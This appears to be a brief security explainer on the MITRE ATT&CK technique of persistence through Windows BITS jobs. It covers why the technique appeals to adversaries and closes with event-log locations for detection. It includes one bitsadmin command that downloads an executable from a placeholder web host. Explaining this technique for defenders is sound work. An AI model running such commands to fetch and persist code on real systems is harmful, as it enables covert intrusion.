MITRE ATT&CK (Persistence): BITS Jobs
What is BITS?
Background Intelligent Transfer Service (BITS) is a technology developed by Microsoft to manage file uploads and downloads, to and from HTTP servers and SMB shares.
Benefits of BITS
- BITS tasks are self-contained in the BITS job database, without new files or registry modification.
- Creation of long standing jobs are supported with the default maximum lifetime of 90 days and can be extendable.
- BITS tasks are often permitted by the host firewalls.
- BITS tasks are also able to resume transfer after a network outage or reboot.
How to run BITS jobs?
cmd.exe /c bitsadmin /transfer JOBNAME /download /priority high http://downloadwebsite/file.exe c:\downloadfile.exe
When bitsadmin.exe is spawned, it will create the transfer job, assign it to svchost.exe and exit the process. svchost.exe is a process that managed network services. So, you will see the below process being run:
c:\windows\system32\svchost.exe -k netsvcs -p -s bits
How to detect BITS jobs?
This makes BITS a useful tool for the adversaries to maintain persistence and execute malicious codes. We can detect BITS specific artifacts under:
Microsoft Windows event log: “Microsoft-Windows-Bits-Client Operational.evtx”
Folder Location: “C:\Windows\System32\Winevt\Logs”;
References:
https://www.sans.org/reading-room/whitepapers/forensics/bits-forensics-39195